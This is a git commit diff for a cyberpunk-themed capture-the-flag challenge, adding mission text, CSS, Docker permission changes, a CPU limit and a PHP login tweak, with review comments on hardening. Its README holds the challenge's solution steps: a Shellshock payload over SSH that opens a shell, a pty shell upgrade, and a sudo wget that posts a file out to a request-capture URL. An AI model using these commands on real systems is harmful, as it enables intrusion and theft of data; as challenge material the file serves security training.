
Prod version CTF

Aymeric 2019-01-29 22:21:05 +01:00
parent 71d5ff415e
commit 7828640ed9
4 changed files with 71 additions and 4 deletions


@ -1 +1,63 @@
# Netrunner # Netrunner
chmod 777 mariadb
###
ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
python3 -c 'import pty; pty.spawn("/bin/sh")'
sudo -g zetatech-maintenance wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX
hint Netrunner 2/3: He seems to have a "ghost" in the shell
<style type="text/css">
@font-face {
font-family: 'Share Tech Mono';
font-style: normal;
font-weight: 400;
src: local('Share Tech Mono'), local('ShareTechMono-Regular'), url(../fonts/techmono.woff2) format('woff2');
unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
.netrunner {
color: #db0e15;
font-family: 'Share Tech Mono', monospace;
font-size: 16px;
font-weight: 300;
text-shadow: 0 0 5px rgba(219, 14, 21, .8);
background: url(https://image.ibb.co/h2hLAJ/bg.png);
padding: 20px;
}
.netrunner-bold {
font-weight: 700;
}
.netrunner-orange {
color: #c99c31;
text-shadow: 0 0 5px #c99c31b3;
}
</style>
<p class="netrunner" ><span class="netrunner-bold">V, I got a mission for you!</span> <br> <br>
We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address: <br>
<span class="netrunner-orange">http://149.202.58.152:8080</span> <br> <br>
Find out who he is and a way to stop him.</p>
<p class="netrunner" ><span class="netrunner-bold">Nice V! I owe you one!</span> <br> <br>
But before we go to visit him, I would like to have a means of pressure.
Here is his maintenance access: <br>
<span class="netrunner-orange">http://149.202.58.152:2222</span> <br> <br>
See what you can do and let me know.</p>
<p class="netrunner" ><span class="netrunner-bold">You doing great!</span> <br> <br>
But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.<br><br>
It will allow us to unplug it in case of a glitch.</p>


@ -56,9 +56,9 @@ COPY ./banner /etc/banner
# Configure permissions # Configure permissions
RUN chmod -R 550 /home/${user} \ RUN chmod -R 550 /home/${user} \
&& chown -R ${user}:${user} /home/${user}/.ssh \ && chown -R root:${user} /home/${user} \
&& chmod 500 /home/${user}/.ssh \ && chmod 750 /home/${user}/.ssh \
&& chmod 400 /home/${user}/.ssh/authorized_keys \ && chmod 440 /home/${user}/.ssh/authorized_keys \
&& chmod 773 /tmp \ && chmod 773 /tmp \
&& chmod +t /tmp && chmod +t /tmp
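Review bot: The switch to `chown -R root:${user} /home/${user}` changes who can rewrite the login material, yet the only comment is still `# Configure permissions`, so the intent is not recorded. With root as owner and modes 750/440 on `.ssh` and `authorized_keys`, the account can read its key file through the group but can no longer replace it, which looks deliberate for a shared challenge host. A comment such as `# root owns the home so the challenge user cannot modify authorized_keys or anything else under it` would keep a later edit from reverting this. Separately, `chmod -R 550` sets the execute bit on every regular file under the home directory; `chmod -R u=rX,g=rX,o= /home/${user}` would keep execute to directories and files that already had it. The two `/tmp` lines can be a single `chmod 1773 /tmp`.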


@ -1,4 +1,4 @@
version: '3' version: '2.2'
services: services:
web: web:
@ -39,3 +39,4 @@ services:
ports: ports:
- "2222:22" - "2222:22"
restart: always restart: always
cpus: '.3'
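Review bot: The added `cpus: '.3'` caps CPU time only. The service publishing `2222:22` appears to expose SSH to participants, and nothing visible in this hunk bounds its memory or process count, so a single session could still starve the host. File format 2.2 accepts `mem_limit` and `pids_limit` at service level, so `mem_limit: 256m` and `pids_limit: 100` next to `cpus` would cover both (values are illustrative and need sizing for the challenge). The service definition starts above the hunk, so such limits may already be set there.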


@ -47,10 +47,14 @@ if (isset($_POST['login']) && $_POST['login'] == 'Login') {
</div>"; </div>";
$state->string = $html_login; $state->string = $html_login;
} elseif ( $num_row == 1 && $row['user'] === 'admin') {
$state->return = 'false';
$state->string = 'admin is desactivated. Use your login.';
} else { } else {
$state->return = 'false'; $state->return = 'false';
$state->string = 'Access Denied'; $state->string = 'Access Denied';
} }
} else { } else {
$state->return = 'password'; $state->return = 'password';
$state->string = 'Password Missing'; $state->string = 'Password Missing';